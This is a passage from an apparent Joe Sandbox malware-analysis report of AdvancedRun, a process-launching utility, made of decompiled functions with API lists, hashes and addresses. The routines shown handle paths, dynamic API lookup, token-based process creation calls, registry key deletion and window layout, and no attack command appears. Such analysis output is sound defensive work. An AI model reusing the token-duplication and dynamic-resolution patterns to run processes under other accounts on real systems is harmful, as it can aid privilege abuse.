                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                  • API String ID: 1283228442-2366825230
                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                  0x0040920a
                                                                  0x00409218
                                                                  0x00409223
                                                                  0x0040922c
                                                                  0x0040924b
                                                                  0x00409253
                                                                  0x0040929b
                                                                  0x004092e4
                                                                  0x0040929d
                                                                  0x004092a3
                                                                  0x004092b1
                                                                  0x004092bd
                                                                  0x004092cc
                                                                  0x004092d1
                                                                  0x004092d8
                                                                  0x004092dd
                                                                  0x00409255
                                                                  0x0040925b
                                                                  0x00409269
                                                                  0x00409275
                                                                  0x00409282
                                                                  0x0040928d
                                                                  0x00409292
                                                                  0x004092ec
                                                                  0x004092ef
                                                                  0x004092ef
                                                                  0x00409231
                                                                  0x00409232
                                                                  0x00409233
                                                                  0x00000000
                                                                  0x00409239
                                                                  0x0040921a
                                                                  0x00000000

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409223
                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                  • memset.MSVCRT ref: 00409269
                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                  • memset.MSVCRT ref: 004092B1
                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                  • String ID: \systemroot
                                                                  • API String ID: 4173585201-1821301763
                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 48%
                                                                  			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                  0x00409c73
                                                                  0x00409c7c
                                                                  0x00409c90
                                                                  0x00409c9f
                                                                  0x00409ca2
                                                                  0x00409ca7
                                                                  0x00409ca9
                                                                  0x00409cb1
                                                                  0x00409cc0
                                                                  0x00409cc2
                                                                  0x00409cc7
                                                                  0x00409ccf
                                                                  0x00409cd0
                                                                  0x00409cd7
                                                                  0x00409cd8
                                                                  0x00409cd9
                                                                  0x00409cda
                                                                  0x00409cdc
                                                                  0x00409ce0
                                                                  0x00409ce1
                                                                  0x00409ce9
                                                                  0x00409cf1
                                                                  0x00409cfb
                                                                  0x00409d08
                                                                  0x00409d08
                                                                  0x00000000
                                                                  0x00409d0d
                                                                  0x00409d0f

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                  • API String ID: 1027343248-2054640941
                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                  0x004028a3
                                                                  0x004028ab
                                                                  0x004028bd
                                                                  0x004028ca
                                                                  0x004028d7
                                                                  0x004028e3
                                                                  0x004028e6
                                                                  0x004028e8
                                                                  0x00000000
                                                                  0x004028eb
                                                                  0x004028ec

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                  • API String ID: 2238633743-1970996977
                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 39%
                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                  0x004045c2
                                                                  0x004045d1
                                                                  0x004045da
                                                                  0x004045ef
                                                                  0x004045f6
                                                                  0x00404604
                                                                  0x0040460b
                                                                  0x00404610
                                                                  0x00404616
                                                                  0x00404617
                                                                  0x00404618
                                                                  0x00404628
                                                                  0x00404629
                                                                  0x0040462a
                                                                  0x0040462f
                                                                  0x00404630
                                                                  0x00404631
                                                                  0x0040463c
                                                                  0x0040463d
                                                                  0x0040463e
                                                                  0x00404656
                                                                  0x00404662
                                                                  0x0040466b
                                                                  0x0040466d
                                                                  0x0040466e
                                                                  0x00404674
                                                                  0x00404679

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                  • API String ID: 1018939227-3575174989
                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                  0x0040314a
                                                                  0x00403151
                                                                  0x00403158
                                                                  0x0040315a
                                                                  0x00403162
                                                                  0x00403166
                                                                  0x00403190
                                                                  0x00403190
                                                                  0x00403198
                                                                  0x00403199
                                                                  0x0040319e
                                                                  0x004031bb
                                                                  0x004031a0
                                                                  0x004031ad
                                                                  0x004031b6
                                                                  0x004031b6
                                                                  0x0040319e
                                                                  0x0040316e
                                                                  0x00403176
                                                                  0x0040317c
                                                                  0x0040317f
                                                                  0x0040317f
                                                                  0x00403182
                                                                  0x0040318a
                                                                  0x00000000
                                                                  0x0040318c
                                                                  0x0040318c
                                                                  0x00000000
                                                                  0x0040318c

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                  • API String ID: 2780580303-317687271
                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                  0x00404da9
                                                                  0x00404dbc
                                                                  0x00404dbf
                                                                  0x00404dc6
                                                                  0x00404dcc
                                                                  0x00404dce
                                                                  0x00404de1
                                                                  0x00404deb
                                                                  0x00404df2
                                                                  0x00404df4
                                                                  0x00404df4
                                                                  0x00404e07
                                                                  0x00404e0d
                                                                  0x00404e18
                                                                  0x00404e1c
                                                                  0x00404e1e
                                                                  0x00404e27
                                                                  0x00404e28
                                                                  0x00404e29
                                                                  0x00404e2f
                                                                  0x00404e31
                                                                  0x00404e37
                                                                  0x00404e41
                                                                  0x00404e42
                                                                  0x00404e43
                                                                  0x00404e46
                                                                  0x00404e46
                                                                  0x00404e1c
                                                                  0x00404e4d
                                                                  0x00404e50
                                                                  0x00404e5f
                                                                  0x00404e66
                                                                  0x00404e52
                                                                  0x00404e52
                                                                  0x00404e52
                                                                  0x00404e6d
                                                                  0x00404e70
                                                                  0x00404e85
                                                                  0x00404e85
                                                                  0x00000000
                                                                  0x00404e72
                                                                  0x00404e7b
                                                                  0x00404e80
                                                                  0x00404e83
                                                                  0x00404e87
                                                                  0x00404e89
                                                                  0x00404e8b
                                                                  0x00404e8b
                                                                  0x00404ea8
                                                                  0x00404ea8
                                                                  0x00000000
                                                                  0x00404e83

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                  • String ID:
                                                                  • API String ID: 2163313125-0
                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 88%
                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                  0x0040639c
                                                                  0x004063a4
                                                                  0x004063b2
                                                                  0x004063c2
                                                                  0x004063d3
                                                                  0x004063dc
                                                                  0x004063eb
                                                                  0x004063f0
                                                                  0x00406401
                                                                  0x00000000
                                                                  0x0040641e
                                                                  0x0040641f

                                                                  APIs
                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32(0040FDA0,?,0040C4E8,0040FE30,?,0040FB90), ref: 00405F30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                  • API String ID: 3176057301-2039793938
                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 16%
                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                  0x0040adf6
                                                                  0x0040adf8
                                                                  0x0040adfa
                                                                  0x0040adfb
                                                                  0x0040adfb
                                                                  0x0040ae02
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040ae04
                                                                  0x0040ae05
                                                                  0x0040ae6d
                                                                  0x0040ae6e
                                                                  0x0040ae73
                                                                  0x0040ae76
                                                                  0x0040ae7f
                                                                  0x0040ae83
                                                                  0x0040ae86
                                                                  0x00000000
                                                                  0x0040ae86
